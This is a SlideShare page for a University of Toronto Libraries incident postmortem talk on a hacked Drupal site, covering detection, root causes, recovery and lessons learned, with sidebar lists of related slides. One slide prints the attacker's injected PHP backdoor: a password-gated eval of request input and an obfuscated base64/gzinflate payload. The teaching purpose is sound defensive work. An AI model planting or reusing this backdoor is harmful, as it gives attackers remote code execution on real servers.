SlideShare une entreprise Scribd logo

Anatomy of a Drupal Hack - TechKnowFile 2014

Télécharger en tant que PPTX, PDF
University of Toronto Libraries - Information Technology Services
University of Toronto Libraries - Information Technology Services
Technologie
1  sur  39
Anatomy of a Drupal Hack Graham Stewart Network and Storage Services Manager Bilal Khalid Senior Application Developer University of Toronto Libraries
ITS at University of Toronto Libraries => wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community. => develop and maintain digital collections and web-based resources => upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012 Photo: Gordon Belray
Photo: Gordon Belray
Photo: Gordon Belray
Photo: Gordon Belray
Not just hardware ... Collaborative environment between: - programmers / developers / designers - librarians - sysadmins / operations Technology environment: - open source tools - Linux (Ubuntu, Redhat), KVM
… and we’re hiring !
Drupal @UTL
Application and caching Database Load balancing Storage or rsync IP HAProxy / Keepalived HAProxy / Keepalived IP Memcached/ Keepalived Memcached/ Keepalived IPMySQL MySQL User Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP
February 14, 2013
12:10 “Armorial is down!”
12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
Symptom or root problem? Chef ? MySQL error? Restart Apache? Restart server? Recent OS updates? PHP versions? Drupal Customizations? Anything updated in Drupal? Hacked !?#%$&!
Detection - apache log analysis - looked for odd traffic patterns - in particular, isolated all wp-conf requests - “hack” attempt started a couple of weeks before - successful injection occurred the day before
Exploit... FCKEditor Bug - allows XSS attacks Sources: https://drupal.org/node/1482528 http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload .com/exploit/na/drupal-fckeditorckeditor-php-execution
… + PHP Execution... PHP Filter Module - core module that allows ‘client’ PHP execution - disabled by default
… + Permission issues... Incorrect rwx permissions for sites/default/files - allowed user uploaded files to be executable by www- data - www-data also had write permissions to /var/www!
… = Code Injection Snippet found inserted at the top of random PHP files throughout the site: if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1 PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+ vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA'))); Reversing gzinflate:
Snooping Utility
Risk Exposure - hijack/deface site - ransomware => blackmail - host their own content - execute phishing attacks - gain access to other sites on server (if any) - exploit OS vulnerabilities
Risk Exposure - use Drupal’s settings.php to gain access to the database/salt - harvest public/private site content - access personal user information (including passwords!!) - access other dbs/sites if they use the same credentials
The Recovery - Restoration - restored site from a couple of days prior - all servers are backed up nightly (incl. files and db) - at most 48 hours of data loss - correct file-system permissions - disabled FCKEditor, PHP Filter modules - reset Drupal admin password - changed all site users’ passwords
The Recovery - Communication - contacted all potentially affected site members - clear, honest communication - possibility of personal information being leaked - possibility passwords might have been compromised - do users use same passwords for other services?
Lessons Learned - Drupal - first real Drupal problem - follow Drupal security guidelines! - https://drupal.org/security/secure-configuration - vet the required core, contrib and custom modules for project - stay on top of the updates - test patches and updates and implement rapidly - use https for all secure pages (whenever possible) - install security modules - Security Review, Security Kit, Login Security, ... - if developing, use Drupal’s built-in checking functions
Lessons Learned - Operational - review site security policies - enforcement: periodic security sweeps - tight control on production environments - protect the core code with version control - use https whenever authentication is involved - mod_security to block attacks - establish security analysis practices - metrics - traffic analysis - log triggers and notifications
Embrace Failure - Failure rarely has a single cause: - systems are very complex, many interdependencies - answers are not necessarily obvious - weakness can be latent, triggered by other flaws - red herrings - swiss cheese
Source: John Allspaw: Advanced PostMortem Fu and Human Error 101 http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101- velocity-2011
Lessons Learned - Cultural - Everyone must have the organization’s end goals in mind - Team of experts or team of poly-skilled polyglots? - Emergency roles may differ from normal roles - Emergency communication channels must be defined - Failure rehearsals: deliberately break things: - The culture must be free of blame
Further Information https://drupal.org/security/secure-configuration https://drupal.org/writing-secure-code http://www.cameronandwilding.com/blog/pablo/10-most-critical- drupal-security-risks http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and- human-error-101-velocity-2011 http://www.kitchensoap.com/ http://arstechnica.com/information-technology/2012/07/netflix- attacks-own-network-with-chaos-monkey-and-now-you-can-too/
Questions? Thank You

Recommandé

Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail Scanner
Xavier Mertens
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
Chris Hales
 
A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013
Chris Hales
 
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps_Fest
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
DoktorMandrake
 
Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)
Mandakini Kumari
 
Hadoop Installation
Hadoop InstallationHadoop Installation
Hadoop Installation
Ahmed Salman
 

Recommandé

Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail Scanner
Xavier Mertens
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
Chris Hales
 
A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013A Drush Primer - DrupalCamp Chattanooga 2013
A Drush Primer - DrupalCamp Chattanooga 2013
Chris Hales
 
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps Fest 2019. Сергей Марченко. Terraform: a novel about modules, provider...
DevOps_Fest
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
DoktorMandrake
 
Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)Html5 drupal7 with mandakini kumari(1)
Html5 drupal7 with mandakini kumari(1)
Mandakini Kumari
 
Hadoop Installation
Hadoop InstallationHadoop Installation
Hadoop Installation
Ahmed Salman
 
Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friends
lucenerevolution
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exercise
Shiva Rama Krishna Dasharathi
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4
Prof. Wim Van Criekinge
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFS
Saumitra Srivastav
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
PROIDEA
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a cluster
Xuhong Zhang
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
Fedir RYKHTIK
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solr
Mike Frampton
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetup
Bharvi Dixit
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
n|u - The Open Security Community
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Josef Cacek
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)
Chris Casano
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014
Josef Cacek
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfm
qqlan
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Environment for training models
Environment for training modelsEnvironment for training models
Environment for training models
FlyElephant
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 

Contenu connexe

Tendances

CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
PROIDEA
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a cluster
Xuhong Zhang
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetup
Bharvi Dixit
 

Tendances (17)

Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friends
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exercise
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFS
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a cluster
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solr
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetup
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning Talk
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfm
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 

Similaire à Anatomy of a Drupal Hack - TechKnowFile 2014

Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
Gábor Hojtsy
 

Similaire à Anatomy of a Drupal Hack - TechKnowFile 2014 (20)

Environment for training models
Environment for training modelsEnvironment for training models
Environment for training models
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scaling
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline Security
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Continuous Security
Continuous SecurityContinuous Security
Continuous Security
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sun
 
Web application security
Web application securityWeb application security
Web application security
 
Secure your site
Secure your siteSecure your site
Secure your site
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 

Plus de University of Toronto Libraries - Information Technology Services

ReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings ManagementReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings Management
University of Toronto Libraries - Information Technology Services
 
Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...
University of Toronto Libraries - Information Technology Services
 
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
University of Toronto Libraries - Information Technology Services
 

Plus de University of Toronto Libraries - Information Technology Services (20)

ReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings ManagementReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings Management
 
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities ProjectsUsing Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
 
Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...
 
The Ontario library research cloud
The Ontario library research cloudThe Ontario library research cloud
The Ontario library research cloud
 
Digital preservation policy for humans
Digital preservation policy for humansDigital preservation policy for humans
Digital preservation policy for humans
 
Islandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & ExhibitsIslandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & Exhibits
 
Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...
 
Collections UofT - TRY 2014
Collections UofT - TRY 2014Collections UofT - TRY 2014
Collections UofT - TRY 2014
 
Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...
 
Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014
 
Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...
 
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
 
Communicating Changes in Digital Services
Communicating Changes in Digital Services Communicating Changes in Digital Services
Communicating Changes in Digital Services
 
Why schema.org?
Why schema.org?Why schema.org?
Why schema.org?
 
Library Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic ControlLibrary Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic Control
 
Introduction to the Semantic Web
Introduction to the Semantic WebIntroduction to the Semantic Web
Introduction to the Semantic Web
 
Brave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and SolutionsBrave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and Solutions
 
Responsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto LibrariesResponsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto Libraries
 
My Media at University of Toronto Libraries
My Media at University of Toronto LibrariesMy Media at University of Toronto Libraries
My Media at University of Toronto Libraries
 
Digital Signage at University of Toronto Libraries
Digital Signage at University of Toronto LibrariesDigital Signage at University of Toronto Libraries
Digital Signage at University of Toronto Libraries
 

Dernier

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Dernier (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Anatomy of a Drupal Hack - TechKnowFile 2014

  • 1. Anatomy of a Drupal Hack Graham Stewart Network and Storage Services Manager Bilal Khalid Senior Application Developer University of Toronto Libraries
  • 2. ITS at University of Toronto Libraries => wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community. => develop and maintain digital collections and web-based resources => upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012 Photo: Gordon Belray
  • 6. Not just hardware ... Collaborative environment between: - programmers / developers / designers - librarians - sysadmins / operations Technology environment: - open source tools - Linux (Ubuntu, Redhat), KVM
  • 7. … and we’re hiring !
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16. Application and caching Database Load balancing Storage or rsync IP HAProxy / Keepalived HAProxy / Keepalived IP Memcached/ Keepalived Memcached/ Keepalived IPMySQL MySQL User Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP
